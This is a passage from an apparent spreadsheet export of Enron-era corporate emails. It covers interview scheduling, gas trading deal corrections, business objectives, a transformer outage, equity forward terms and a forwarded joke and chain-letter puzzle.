    16.Some days you are the bug, some days you are the windshield._x000D_
_x000D_
    17.Don't worry, it only seems kinky the first time._x000D_
_x000D_
    18.If at first you don't succeed,  skydiving is not for you._x000D_
_x000D_
    19.Don't squat with your spurs on._x000D_
_x000D_
    20.Good judgment comes from bad experience and a lot of that comes from_x000D_
bad judgment._x000D_
_x000D_
    21.The quickest way to double your money is to hold it in half and put it_x000D_
back  in your pocket._x000D_
_x000D_
    22.Timing has an awful lot to do with the outcome of a raindance._x000D_
_x000D_
    23.A closed mouth gathers no foot._x000D_
_x000D_
    24.Duct tape is like the force, it has a light side and a dark side and_x000D_
it holds the universe together._x000D_
_x000D_
    25.Eagles may soar, but weasels don't get sucked into jet engines._x000D_
_x000D_
    26.There are two theories to arguing with women. Neither one works._x000D_
_x000D_
    27.Never miss a good chance to shut up._x000D_
_x000D_
    28.Generally speaking, you aren't learning much when your mouth is moving._x000D_
_x000D_
    29.Before you criticize someone, you should walk a mile in their shoes._x000D_
That way, when you criticize them, you're a mile away and you have their_x000D_
shoes._x000D_
_x000D_
    30.Experience is something you don't get until just after you need it._x000D_
_x000D_
    31.Don't be irreplaceable; if you can't be replaced,  you can't be_x000D_
promoted._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 1 Jun 2000 01:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'beth.miertschin@enron.com'})</t>
  </si>
  <si>
    <t>Re: Super Saturday Interviews</t>
  </si>
  <si>
    <t xml:space="preserve">Beth,_x000D_
_x000D_
Thanks._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Beth Miertschin                           05/31/2000 06:14 PM_x000D_
	_x000D_
_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Super Saturday Interviews  _x000D_
_x000D_
Vince -_x000D_
That is not a problem.  We will not schedule you for a dinner.  Thanks for _x000D_
your help with interviews!_x000D_
Beth_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Vince J Kaminski_x000D_
05/31/2000 06:04 PM_x000D_
To: Beth Miertschin/HOU/ECT@ECT_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT, Shirley Crenshaw/HOU/ECT@ECT _x000D_
Subject: Re: Super Saturday Interviews  _x000D_
_x000D_
Beth,_x000D_
_x000D_
Please, let me know about Friday night. I want to know if I should_x000D_
dress up for dinner. I am very busy and I would be glad to skip dinner_x000D_
if you have  enough people to cover it._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Beth Miertschin                           05/31/2000 05:19 PM_x000D_
	_x000D_
_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Super Saturday Interviews_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Beth Miertschin/HOU/ECT on 05/31/2000 _x000D_
05:19 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Beth Miertschin                           05/31/2000 01:51 PM_x000D_
	_x000D_
_x000D_
To: Kevin Ruscitti/HOU/ECT@ECT, Tom Adams/HOU/EES@EES, Harold _x000D_
Bertram/HOU/ECT@ECT, Ted C Bland/HOU/ECT@ECT, W Tom Byargeon/HOU/ECT@ECT, _x000D_
Rogers Herndon/HOU/ECT@ect, Kevin McGowan/Corp/Enron@ENRON, Cindy _x000D_
Skinner/HOU/ECT@ECT, Mark Tawney/HOU/ECT@ECT, Greg Woulfe/HOU/ECT@ECT, _x000D_
Matthew Arnold/HOU/ECT@ECT, Keith Holst/HOU/ECT@ect, Elspeth _x000D_
Inglis/Corp/Enron@Enron, Kim Melodick/HOU/ECT@ECT, Sheila Walton/HOU/ECT@ECT, _x000D_
Janet R Dietrich/HOU/ECT@ECT, Gary Hickerson/HOU/ECT@ECT, Vince J _x000D_
Kaminski/HOU/ECT@ECT, George McClellan/HOU/ECT@ECT, Julia Murray/HOU/ECT@ECT, _x000D_
Jere C Overdyke/HOU/ECT@ECT, Jeffrey A Shankman/HOU/ECT@ECT, Fran L _x000D_
Mayes/HOU/ECT@ECT, Dave Hill/Corp/Enron@Enron, Brad McSherry/HOU/ECT@ECT, _x000D_
Toni Graham/Corp/Enron@Enron, James A Ajello/HOU/ECT@ECT, Phillip K _x000D_
Allen/HOU/ECT@ECT, Edward D Baughman/HOU/ECT@ECT, Sally Beck/HOU/ECT@ECT, Bob _x000D_
Crane/HOU/ECT@ECT, David Oxley/HOU/ECT@ECT, Kevin M Presto/HOU/ECT@ECT, _x000D_
Daniel Reck/HOU/ECT@ECT, Hunter S Shively/HOU/ECT@ECT, Cedric _x000D_
Burgher/Corp/Enron@ENRON_x000D_
cc: Ginger B Gamble/HOU/ECT@ECT, Shelly Jones/HOU/ECT@ECT _x000D_
Subject: Super Saturday Interviews_x000D_
_x000D_
Thank you for volunteering to interview this Super Saturday, June 3rd.  We _x000D_
are working on the interview schedule and you will be receiving an interview _x000D_
packet no later than Friday morning.  Please let us know as soon as possible _x000D_
if you have any conflicts and will not be able to participate._x000D_
_x000D_
We appreciate your support of the Associate/Analyst Program._x000D_
_x000D_
Beth Miertschin_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Nov 2001 09:47:12 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kyle.kettler@dynegy.com'})</t>
  </si>
  <si>
    <t>Last schedule</t>
  </si>
  <si>
    <t>_x000D_
Kyle:_x000D_
_x000D_
Please find attached file. Transportation &amp; Storage Revenue is right off the Earning Model Income Statement. Carlton data can be found in the Commercial Function detail within the "Database" worksheet of the Earning Model. The Cash Flow verbiage is very general related to the subject matter, but does provide a business reason on a Direct Cash Flow basis for an item buried within the Indirect Cash Flow format. Call me if you have any further questions and I will attempt to get you through them.    I can also get you set up to get even more detailed answers if you would like.   _x000D_
_x000D_
Rod Hayslett_x000D_
EB4054_x000D_
713-853-6178_x000D_
                _x000D_
_x000D_
_x000D_
_x000D_
Rod,_x000D_
_x000D_
Thanks for the email.  Can you help me match the information in this email_x000D_
to your operating plan or cash flow analysis?_x000D_
_x000D_
Kyle_x000D_
_x000D_
 _x000D_
 &lt;&lt;AnnualStats.xls&gt;&gt;_x000D_
_x000D_
_x000D_
_x000D_
(See attached file: AnnualStats.xls)</t>
  </si>
  <si>
    <t>Wed, 9 May 2001 18:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'teresa.wood@enron.com', 'meredith.homco@enron.com', 'clarissa.garcia@enron.com', 'steve.gillespie@enron.com'})</t>
  </si>
  <si>
    <t>Trco VNG for the 8th</t>
  </si>
  <si>
    <t>On the 8th TP2 sold VNG 10,000 dth at st 65.  This volume was entered on deal 760980, which is a VNG buy from Gulf 1.  I took the volume on this deal to 0 for the 8th and created deal 780794 (VNG buy from TP2 at St 65).  Please make a note in you files._x000D_
_x000D_
Meredith, you will need to repath these deals on the 8th._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Thu, 1 Nov 2001 15:54:21 -0800 (PST)</t>
  </si>
  <si>
    <t>Bullets for Friday</t>
  </si>
  <si>
    <t xml:space="preserve">Lorraine, _x000D_
_x000D_
Here is a start to the Bullets.  Thank you for handling this for the team today!  I'll see you Friday afternoon._x000D_
_x000D_
Kim._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 13 Nov 2001 16:39:57 -0800 (PST)</t>
  </si>
  <si>
    <t>Year End Accomplishments</t>
  </si>
  <si>
    <t>It is that time of year.... Please complete your list of accomplishments by the end of November.  _x000D_
_x000D_
Also, please complete your 2002 Objectives by December 14.  Your objectives will need to outline your specific marketing plan for each customer, project and idea you may have for adding/increasing value to Transwestern in 2002.  As discussed earlier, we will get together in mid-December to review account loads to see if we need to do any shifting.  Your 2002 Objectives will be helpful in determining whether your load is heavy, light or just right.   _x000D_
_x000D_
I will be happy to visit with each of you individually if you have any questions or would like to discuss these items.    :&gt;)_x000D_
_x000D_
Thanks,_x000D_
Kim.</t>
  </si>
  <si>
    <t>Tue, 6 Mar 2001 00:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Fwd: (no subject)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Mike Maggi/Corp/Enron on 03/06/2001 08:34 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Mattmaggi@aol.com on 03/05/2001 09:11:44 PM_x000D_
To: mmaggi@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: Fwd: (no subject)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Content-Transfer-Encoding: 7bit_x000D_
Return-path: &lt;RanaMike@aol.com&gt;_x000D_
From: RanaMike@aol.com_x000D_
Full-name: RanaMike_x000D_
Message-ID: &lt;37.117bed02.27d1b6d7@aol.com&gt;_x000D_
Date: Fri, 2 Mar 2001 21:54:15 EST_x000D_
Subject: (no subject)_x000D_
To: Anastasia_Harrison@yahoo.com, agaynes@dynax.com, _x000D_
barry.edney@virginnet.co.uk, grace@exchangeconsulting.com, Ianandd@aol.com, _x000D_
jscott@mdp.com, kschumer@austin.rr.com, LisaWells1@hotmail.com, _x000D_
Mattmaggi@aol.com, randie@dtsoft.com, nyctg@msn.com_x000D_
MIME-Version: 1.0_x000D_
Content-Type: text/plain; charset="US-ASCII"_x000D_
X-Mailer: AOL 5.0 for Windows sub 105_x000D_
_x000D_
_x000D_
&gt; &gt; Follow the instructions!_x000D_
&gt; &gt;_x000D_
&gt; &gt;                  NO PEEKING AHEAD!_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;                  Free will or synaptic wiring?_x000D_
&gt; &gt;_x000D_
&gt; &gt;                  You be the judge._x000D_
&gt; &gt;_x000D_
&gt; &gt; * Do the following exercise, guaranteed to raise an eyebrow._x000D_
&gt; &gt;_x000D_
&gt; &gt; * There's no trick or surprise._x000D_
&gt; &gt;_x000D_
&gt; &gt; * Just follow these instructions, and answer the questions one at a_x000D_
&gt;time_x000D_
&gt; &gt;_x000D_
&gt; &gt; and as quickly as you can!_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; * Again, as quickly as you can but don't advance until you've done each_x000D_
&gt; &gt; of them ... really._x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; * Now, scroll down (but not too fast, you might miss something)._x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; *   Think of a number from 1 to 10 &gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;   Multiply that number by 9_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;  &gt; &gt; &gt; &gt; &gt; &gt;        &gt; &gt; &gt; &gt;   &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; If the number is a 2-digit number, add the digits together_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; Now subtract 5_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; Determine which letter in the alphabet corresponds to the number you_x000D_
&gt; &gt; ended up with (example: 1=a, 2=b, 3=c,etc.)_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; Think of a country that starts with that letter_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; Remember the last letter of the name of that country_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; Think of the name of an animal that starts with that letter_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; Remember the last letter in the name of that animal_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; Think of the name of a fruit that starts with that letter_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; Are you thinking of a Kangaroo in Denmark eating an Orange?_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; I told you this was FREAKY!!_x000D_
&gt; &gt;_x000D_
&gt; &gt; If not, you're among the 2% of the &gt; &gt; &gt; &gt; population whose minds are_x000D_
&gt; &gt; different enough to think of something else._x000D_
&gt; &gt;_x000D_
&gt; &gt; 98% of people will answer with kangaroos in Denmark when given this_x000D_
&gt; &gt; exercise. Freaky, huh?_x000D_
&gt; &gt;_x000D_
&gt; &gt; Keep this message going. This one is actually worth sending on to_x000D_
&gt;others._x000D_
&gt; &gt;_x000D_
&gt; &gt; Forward it to people you know and see if they are usual or unusual._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 06:48:47 -0700 (PDT)</t>
  </si>
  <si>
    <t>8:47:59 Synchronizing Mailbox 'Sanders, Richard B.'_x000D_
8:47:59 Synchronizing Hierarchy_x000D_
8:48:00 Synchronizing Favorites_x000D_
8:48:00 Synchronizing Folder 'Inbox'_x000D_
8:48:37 	   54 item(s) added to offline folder_x000D_
8:48:37 	   1 item(s) updated in offline folder_x000D_
8:48:37 	   1 item(s) changed read-state in offline folder_x000D_
8:48:37 	   9 item(s) deleted in offline folder_x000D_
8:48:37 Synchronizing Folder 'Outbox'_x000D_
8:48:37 Synchronizing Folder 'Sent Items'_x000D_
8:48:40 	   9 item(s) added to offline folder_x000D_
8:48:40 Synchronizing Folder 'Calendar'_x000D_
8:48:43 	   14 item(s) added to offline folder_x000D_
8:48:43 	   2 item(s) updated in offline folder_x000D_
8:48:43 	   3 item(s) deleted in offline folder_x000D_
8:48:43 Synchronizing Folder 'Contacts'_x000D_
8:48:44 	   1 item(s) added to offline folder_x000D_
8:48:44 	   2 item(s) updated in offline folder_x000D_
8:48:44 	   1 view(s)/form(s) updated in offline folder_x000D_
8:48:44 Synchronizing Folder 'Drafts'_x000D_
8:48:44 Synchronizing Folder 'Journal'_x000D_
8:48:44 Synchronizing Folder 'Notes'_x000D_
8:48:44 Synchronizing Folder 'Tasks'_x000D_
8:48:45 	   3 item(s) deleted in offline folder_x000D_
8:48:45 Synchronizing Views_x000D_
8:48:46 Synchronizing Forms_x000D_
8:48:47 Done</t>
  </si>
  <si>
    <t>Mon, 5 Feb 2001 09:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Eric,_x000D_
I came up with a few goals and objectives for each group within EGM.  These=_x000D_
=20_x000D_
are what i came up with for LNG and which included some information from Ri=_x000D_
ck._x000D_
_x000D_
Please review and add (and change the language) as you believe better=20_x000D_
represents your business.  Also I need additional specifics where possible._x000D_
_x000D_
 LNG_x000D_
? Create $60 million in gross margin and $50 million in EBIT_x000D_
? Create a portfolio of positions including supply sources, shipping and=20_x000D_
markets to open and generate a new markets for LNG globally that can maximi=_x000D_
ze=20_x000D_
and take advantage of the highest net backs_x000D_
? Develop an online market for LNG on EnronOnline_x000D_
? Close and deliver spot transactions around the world that illustrates Enr=_x000D_
on=01,_x000D_
s ability to change the industry=20_x000D_
? Close Project Jose; successfully manage the supply and shipping positions=_x000D_
=20_x000D_
around Dabhol=20_x000D_
_x000D_
_x000D_
Please amend on this email and return asap._x000D_
thanks,_x000D_
m</t>
  </si>
  <si>
    <t>Tue, 3 Jul 2001 12:25:21 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'controllers.arnold@enron.com', 'rick.smith@enron.com'})</t>
  </si>
  <si>
    <t>RE: Gallup transformer</t>
  </si>
  <si>
    <t>_x000D_
I will keep gas control informed on this outage._x000D_
_x000D_
ds_x000D_
 -----Original Message-----_x000D_
From: 	Smith, Rick  _x000D_
Sent:	Tuesday, July 03, 2001 1:44 PM_x000D_
To:	Schoolcraft, Darrell; Arnold L Eisenstein/ENRON_DEVELOPMENT@ENRON_x000D_
Subject:	Re: Gallup transformer_x000D_
_x000D_
Just so you guys will be in the loop. We will get in an outage scheduled for September after tariff.. Rick_x000D_
---------------------- Forwarded by Rick Smith/ET&amp;S/Enron on 07/03/2001 12:42 PM ---------------------------_x000D_
_x000D_
 _x000D_
Rich Jolly_x000D_
07/03/2001 10:06 AM_x000D_
To:	Team Gallup/ET&amp;S/Enron@Enron_x000D_
cc:	"Caddell, Jim (Contract)" &lt;Jim.R.Caddell@ue-corp.com&gt;, Rick Smith/ET&amp;S/Enron@Enron, Todd Ingalls/ET&amp;S/Enron@Enron _x000D_
_x000D_
Subject:	Re: Gallup transformer   &lt;&lt; OLE Object: StdOleLink &gt;&gt; _x000D_
_x000D_
Thanks Korey. Keep us informed of what's going on and if you need any help._x000D_
RJ_x000D_
_x000D_
_x000D_
 _x000D_
Team Gallup_x000D_
07/02/2001 02:13 PM_x000D_
To:	"Caddell, Jim (Contract)" &lt;Jim.R.Caddell@ue-corp.com&gt;, Rick Smith/ET&amp;S/Enron@Enron, Rich Jolly/ET&amp;S/Enron@Enron, Todd Ingalls/ET&amp;S/Enron@Enron_x000D_
cc:	 _x000D_
_x000D_
Subject:	Gallup transformer   &lt;&lt; OLE Object: StdOleLink &gt;&gt; _x000D_
_x000D_
I talked to Jim about this today. He is going to contact the transformer people (Virginia) to see what they recommend. Jim is thinking they should stand behind this repair since it is a manufacturing problem. Since we are in tariff and no urgent problem exists at this time, maybe gas control will give us 8 hours in September to make the repairs._x000D_
Sorry it took so long to respond but this one got lost in my e-mail._x000D_
Thanks for your help Jim. We will talk again in week or so._x000D_
_x000D_
Thanks, Korey_x000D_
505-863-4104  _x000D_
_x000D_
_x000D_
 _x000D_
"Caddell, Jim (Contract)" &lt;Jim.R.Caddell@ue-corp.com&gt; on 05/23/2001 07:45:18 AM_x000D_
To:	Korey Kruse &lt;team_gallup@enron.com&gt;_x000D_
cc:	"Ingalls, Todd" &lt;Todd.Ingalls@enron.com&gt; _x000D_
_x000D_
Subject:	Gallup_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 &lt;&lt;Gallup No Load Tap.doc&gt;&gt; _x000D_
_x000D_
Jim Caddell_x000D_
_x000D_
Jimmy R. Caddell_x000D_
_x000D_
Senior Consultant_x000D_
_x000D_
Universal Utility Services LLC_x000D_
_x000D_
Lubbock, Texas_x000D_
_x000D_
Off: 806 798 5991_x000D_
_x000D_
Mob: 806 789 8618_x000D_
_x000D_
Jim.R.Caddell@ue-corp.com_x000D_
_x000D_
_x000D_
 - Gallup No Load Tap.doc &lt;&lt; File: Gallup No Load Tap.doc &gt;&gt; _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&lt;Embedded Picture (Device Independent Bitmap)&gt;_x000D_
&lt;Embedded Picture (Device Independent Bitmap)&gt;_x000D_
&lt;Embedded Picture (Device Independent Bitmap)&gt;</t>
  </si>
  <si>
    <t>Thu, 15 Feb 2001 03:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>wait for a little bit b/c i might have it filled.</t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 06:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: FTC inquiry - B2B competition issues</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry about that Alan - see attached notice.  As suggested, I am also copying _x000D_
Marks Greenberg and Taylor - and, by this message, giving them a heads up _x000D_
that I'll touching base to get their thoughts on whether we should be filing _x000D_
comments. -Bob _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 02:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'steve.ross@enron.com', 'sara.shackleton@enron.com'})</t>
  </si>
  <si>
    <t>Forward Terms</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
_x000D_
Jeff Nogid_x000D_
Enron Global Finance_x000D_
713-853-4782_x000D_
----- Forwarded by Jeff Nogid/HOU/ECT on 04/03/01 09:07 AM -----_x000D_
_x000D_
	"Fleming, Matthew" &lt;mfleming@lehman.com&gt;_x000D_
	04/03/01 08:26 AM_x000D_
		 _x000D_
		 To: "'jeff.nogid@enron.com'" &lt;jeff.nogid@enron.com&gt;_x000D_
		 cc: "Kakar, Rahul S" &lt;rkakar@lehman.com&gt;_x000D_
		 Subject: Forward Terms_x000D_
_x000D_
_x000D_
_x000D_
Jeff,_x000D_
_x000D_
As discussed yesterday, please find attached the final numbers for the_x000D_
forward rolls as well as the put options.  The only thing to note is that as_x000D_
Enron pays dividends, the forward prices will be adjusted downward_x000D_
accordingly._x000D_
_x000D_
 &lt;&lt;ENE - Forward Roll.xls&gt;&gt;_x000D_
_x000D_
Please call if there are any questions._x000D_
Regards,_x000D_
Matt_x000D_
_x000D_
_x000D_
Matt Fleming_x000D_
Corporate Equity Derivatives_x000D_
Lehman Brothers, Inc._x000D_
Phone: (212) 526-8030_x000D_
Fax: (212) 526-2755_x000D_
_x000D_
This message is intended only for the personal and confidential use of the_x000D_
designated recipient(s) named above.  If you are not the intended recipient_x000D_
of this message you are hereby notified that any review, dissemination,_x000D_
distribution or copying of this message is strictly prohibited.  This_x000D_
communication is for information purposes only and should not be regarded as_x000D_
an offer to sell or as a solicitation of an offer to buy any financial_x000D_
product, an official confirmation of any transaction, or as an official_x000D_
statement of Lehman Brothers Inc., its subsidiaries or affiliates.  Email_x000D_
transmission cannot be guaranteed to be secure or error-free.  Therefore, we_x000D_
do not represent that this information is complete or accurate and it should_x000D_
not be relied upon as such.  All information is subject to change without_x000D_
notice._x000D_
_x000D_
_x000D_
_x000D_
------------------------------------------------------------------------------_x000D_
This message is intended only for the personal and confidential use of the _x000D_
designated recipient(s) named above.  If you are not the intended recipient _x000D_
of this message you are hereby notified that any review, dissemination, _x000D_
distribution or copying of this message is strictly prohibited.  This _x000D_
communication is for information purposes only and should not be regarded as _x000D_
an offer to sell or as a solicitation of an offer to buy any financial _x000D_
product, an official confirmation of any transaction, or as an official _x000D_
statement of Lehman Brothers Inc.  Email transmission cannot be guaranteed to _x000D_
be secure or error-free.  Therefore, we do not represent that this _x000D_
information is complete or accurate and it should not be relied upon as _x000D_
such.  All information is subject to change without notice._x000D_
_x000D_
_x000D_
 - ENE - Forward Roll.xls</t>
  </si>
  <si>
    <t>Wed, 29 Dec 1999 02:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dscott1@columbiaenergygroup.com', 'pdrexel@columbiaenergygroup.com'})</t>
  </si>
  <si>
    <t>January 1, 2, 3 AGT breakdowns.</t>
  </si>
  <si>
    <t xml:space="preserve">Could you see if the retail people could use this worksheet format? We may _x000D_
not be able to do this for everything but I believe we could use this format _x000D_
for Tennessee, CNG, Tennessee, Tetco and Texas Gas (excluding AGL).  What do _x000D_
you think?_x000D_
---------------------- Forwarded by Chris Germany/HOU/ECT on 12/29/99 10:30 _x000D_
AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Victoria Versen                           12/29/99 08:07 AM_x000D_
	_x000D_
_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: January 1, 2, 3 AGT breakdowns._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Victoria Versen/HOU/ECT on 12/29/99 08:06 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
mstiles@columbiaenergygroup.com on 12/28/99 02:03:19 PM_x000D_
To: Meredith Mitchell/HOU/ECT@ECT, Victoria Versen/HOU/ECT@ECT_x000D_
cc: "        -         *Villagomez, Phil" &lt;pvillag@columbiaenergygroup.com&gt; _x000D_
Subject: January 1, 2, 3 AGT breakdowns._x000D_
_x000D_
_x000D_
_x000D_
Here is a more updated volume breakdown.   We swing down on weekends (and_x000D_
sometimes during the week if the customers shut down).   These volumes are _x000D_
good_x000D_
except for Boston Gas and S. Ct.   We are waiting for the ldc demand curves _x000D_
and_x000D_
Algorithms.   Those two ldc volumes represent our estimates._x000D_
_x000D_
_x000D_
Please let me know when you have a contract number.   Thanks._x000D_
_x000D_
_x000D_
 - agt012000.xls_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 11 Oct 2001 19:50:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tz3qu@msn.com'})</t>
  </si>
  <si>
